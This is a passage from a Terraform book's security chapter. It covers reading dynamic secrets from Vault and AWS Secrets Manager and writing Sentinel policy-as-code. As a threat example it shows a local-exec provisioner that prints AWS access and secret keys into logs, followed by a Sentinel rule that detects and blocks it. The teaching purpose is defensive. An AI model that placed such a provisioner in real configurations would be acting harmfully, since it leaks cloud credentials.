Figure 13.8 The Vault provider works just like any other Terraform provider: it integrates with the API backend and exposes resources and data sources to Terraform. Some of these data sources can be used to read dynamic secrets at runtime.

Sample code for configuring the Vault provider, reading secrets from a data source, and using these secrets to configure the AWS provider is shown in listing 13.8. Every time Terraform runs, new short-lived access credentials will be obtained from Vault.

Warning All the previous rules still apply! You still have to securely manage Terraform variables, state files, and log files.

Listing 13.8 Configuring Terraform with Vault

provider "vault" {
  address = var.vault_address
}
 
data "vault_aws_access_credentials" "creds" {
  backend = "aws"
  role    = "prod-role"
}
 
provider "aws" {
  access_key = data.vault_aws_access_credentials.creds.access_key
  secret_key = data.vault_aws_access_credentials.creds.secret_key
  region     = "us-west-2"
}

Note To reduce the risk of exposing secrets, the Vault provider requests tokens with a relatively short time to live (TTL): 20 minutes by default. Any issued credentials are revoked when the token expires.

13.4.2 AWS Secrets Manager

AWS Secrets Manager (ASM) is a notable competitor to HashiCorp Vault. It allows basic key value storage and rotation of secrets but is generally less sophisticated than Vault and lacks many of Vault’s more advanced features. The main advantage of ASM is that it’s a managed service, which means you don’t need to stand up your own infrastructure to use it; it’s ready to go right out of the box.

Note Azure and GCP both have services comparable to ASM, and the process of using them is basically the same.

Like Vault, ASM allows you to read dynamic secrets at runtime with the help of data sources. Some sample code for doing this is shown next.

Listing 13.9 Configuring Terraform with AWS Secrets Manager

data "aws_secretsmanager_secret_version" "db" {
  secret_id = var.secret_id
}
 
locals {
  creds = jsondecode(data.aws_secretsmanager_secret_version.db.secret_string)
}
 
resource "aws_db_instance" "database" {
  allocated_storage = 20
  engine            = "postgres"
  engine_version    = "12.2"
  instance_class    = "db.t2.micro"
  name              = "ptfe"
  username          = local.creds["username"]
  password          = local.creds["password"]
}

Tip If you are not already using Vault to manage secrets, AWS Secrets Manager is a great alternative.

13.5 Sentinel and policy as code

Sentinel is an embeddable policy-as-code framework designed for automating governance, security, and compliance-based decisions. Complex legal and business requirements, which have traditionally been enforced manually by humans, can be expressed entirely as code with Sentinel polices. Sentinel can automatically prevent out-of-compliance Terraform runs from executing. For example, you normally do not want someone deploying 5,000 virtual machines without explicit authorization. With Terraform, there are no guardrails to prevent users from deploying 5,000 virtual machines. The advantage of Sentinel is that you can write a policy to automatically reject such requests before Terraform applies the changes (see figure 13.9).

CH13_F09_Winkler

Figure 13.9 Sentinel policies are checked between the plan and apply of a Terraform CI/CD pipeline. If any Sentinel policy fails, the run exits with an error condition, and the Apply stage is skipped.

History of Sentinel

The first version of Sentinel was released on September 19, 2017 without much fanfare. At the time, it was not clear how Sentinel could be productized, so nothing much happened until a few months later when HashiCorp advertised Sentinel as a premium service offering for Terraform Enterprise. It was pretty immature as a technology, and I do not know anybody who was using it then. It remained largely unknown and unloved for the next three years.

Today, HashiCorp has revitalized the product. HashiCorp’s Sentinel team includes 10-20 fulltime engineers, and they have made enormous strides in improving the language and increasing adoption. In March 2020, an important update (v0.15) was released that fixed a lot of issues with Sentinel and finally convinced me of Sentinel’s bright future in the HashiCorp ecosystem.

Sentinel is a stand-alone HashiCorp product designed to work with all of HashiCorp’s Enterprise service offerings, including Consul, Nomad, Terraform, and Vault. It has matured over the years and finally found its place under HashiCorp’s “Better Together” narrative. But before I get you too excited about Sentinel and the great things it can do, you should know that it isn’t open source and doesn’t work with open source Terraform.

Can I use Sentinel without an Enterprise license?

Sentinel is distributed as a golang binary, which means anyone can download it and use it for free (although the source code is kept secret). The problem is that to do anything useful with Sentinel, you need access to the plugins written for Terraform, which are currently reserved for Enterprise customers (and, to a lesser extent, Terraform Cloud).

Sentinel plugins are just golang code, so it’s theoretically possible that someone could write their own plugin with all the same features as the one HashiCorp created and then open source it. But so far, nobody has taken the initiative to do so. If this were to be done, then anyone could use Sentinel with Terraform and not have to pay HashiCorp. It’s also possible that HashiCorp could simply open source Sentinel in the future.

13.5.1 Writing a basic Sentinel policy

Sentinel policies are not written in HCL, as you might expect. Instead, they are written in Sentinel. Sentinel is its own domain-specific programming language, which has a passing resemblance to Python. Sentinel policies are made up of rules, which are basically just functions that return either true or false (pass or fail). As long as all the rules in a policy pass, the overall policy passes. If you are using Sentinel in a CI/CD pipeline, that means execution continues to the apply.

The following is a trivial Sentinel policy that passes for all use cases:

main = rule {     
    true 
}

A policy with a single rule that always evaluates to true

Why DSL and not Python, Ruby, or another programming language?

Sometimes I think that Mitchell Hashimoto and Armon Dadgar (other co-founder of HashiCorp) just like creating new programming languages for the heck of it. After all, why create HCL when JSON or YAML would do? Why create Sentinel when Python or Ruby is good enough? The answer is that Armon and Mitchell have an ambitious and unwavering vision—and they decided the best way to realize their vision was to invest in creating a new programming language.

The most important design element of Sentinel is that it’s a sandbox programming language. Most other languages have security loopholes or backdoors that can be used to bypass normal operations and escalate system access. Ruby and Python, for example, are both dynamic languages that can be monkey-patched at runtime. As a language designed with governance and compliance in mind, Sentinel had to be embeddable to be secure from hackers. Another sandbox programming language like Lua or JavaScript could have worked, but the syntax wouldn’t have been as clean, as neither was initially created with the goal of writing policy as code.

As an emerging technology, Sentinel is not as mature as most other programming languages, but it does have all the basic expressions and syntax elements you expect. It also has an adequate, if rather small, standard library. This makes Sentinel good for day-to-day work, even if it’s not the greatest programming language ever.

13.5.2 Blocking local-exec provisioners

The goal of this book isn’t to teach Sentinel, but I want to give you a feel for the practical problems you can solve with it. Consider the dilemma we had earlier with being able to print environment variables such as AWS_ACCESS_KEY_ID and AWS_SECRET _ACCESS_KEY using local-exec provisioners. Here’s the code that did this:

resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = <<-EOF
        echo "access_key=$AWS_ACCESS_KEY_ID"
        echo "secret_key=$AWS_SECRET_ACCESS_KEY"
    EOF
    }
}

Without Sentinel, you would have to manually skim through all the configuration code to make sure nobody is abusing local-exec provisioners this way. With Sentinel, you can write a policy to automatically block all Terraform runs containing configuration code that has the keyword AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS _KEY in a provisioner. The following Sentinel policy does just that.

Listing 13.10 Sentinel policy for validating local-exec provisioners

import "tfconfig/v2" as tfconfig
 
keywordInProvisioners = func(s){
    bad_provisioners = filter tfconfig.provisioners as _, p {
        p.type is "local-exec" and
        p.config.command["constant_value"] matches s
    }
    return length(bad_provisioners) > 0
}
 
no_access_keys = rule {
    not keywordInProvisioners("AWS_ACCESS_KEY_ID")
}
 
no_secret_keys = rule {
    not keywordInProvisioners("AWS_SECRET_ACCESS_KEY")
}
 
main = rule {                
    no_access_keys and
    no_secret_keys
}

Rule that disallows access keys and secret keys from being printed by local-exec provisioners

Note Sentinel policies are not easy to write! You should expect a steep learning curve even if you are already a skilled programmer.

If we incorporate this Sentinel policy as part of our CI/CD pipeline, a subsequent run fails with the following error message:

$ sentinel apply p.sentinel
Fail
 
Execution trace. The information below will show the values of all
the rules evaluated and their intermediate boolean expressions. Note that
some boolean expressions may be missing if short-circuit logic was taken.
 
FALSE - p.sentinel:19:1 - Rule "main"             
  FALSE - p.sentinel:20:2 - no_access_keys
    FALSE - p.sentinel:12:2 - not keywordInProvisioners("AWS_ACCESS_KEY_ID")
      TRUE - p.sentinel:5:3 - p.type is "local-exec"
      TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s
 
FALSE - p.sentinel:11:1 - Rule "no_access_keys"
  TRUE - p.sentinel:5:3 - p.type is "local-exec"
  TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s

The main rule has failed because the “no_access_keys” composition rule has failed.

You can use Sentinel to enforce that any attribute on any resource is what you want it to be. Examples of other common policies include disallowing 0.0.0.0/0 Classless Inter-Domain Routing (CIDR) blocks, restricting instance types of Elastic Compute Service (EC2) instances, and enforcing tagging on resources.

TIP If you are not a programmer or don’t have time to write your own policies, you can also use policies written by other people (which are published as Sentinel modules).

13.6 Final words

We are at the end of the last chapter of the book. You now know the fundamentals of Terraform, which are important as an individual contributor, as well as how to manage, extend, automate, and secure Terraform. You know all the tricks and backdoors that hackers can use to steal your sensitive information—and, more important, you know how to fight back. At this point, you should feel extremely confident in your ability to tackle any problem with Terraform. You are a Terraform guru now, and people will look to you for guidance on the subject matter.

Even though this is the end of our journey together, I hope you will have many more great experiences working with Terraform in the future. Please email me or leave a review if you liked the book. Thanks for reading.

Summary

  • State files can be secured by removing unnecessary secrets, with least-privileged access control, and using encryption at rest

  • Log files can be secured by turning off trace logs and avoiding the use of local-exec provisioners, external data sources, and the HTTP provider.

  • Static secrets should be set as environment variables whenever possible. If you absolutely must use Terraform variables, consider maintaining a separate secrets.tfvars file explicitly for this purpose.

  • Dynamic secrets are far safer than static secrets because they are created on demand and valid for only the period of time they will be used. You can read dynamic secrets with the corresponding data source from Vault or the AWS provider.

  • Sentinel can enforce policy as code. Sentinel policies automatically reject Terraform runs based on the contents of the configuration code or the results of a plan.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset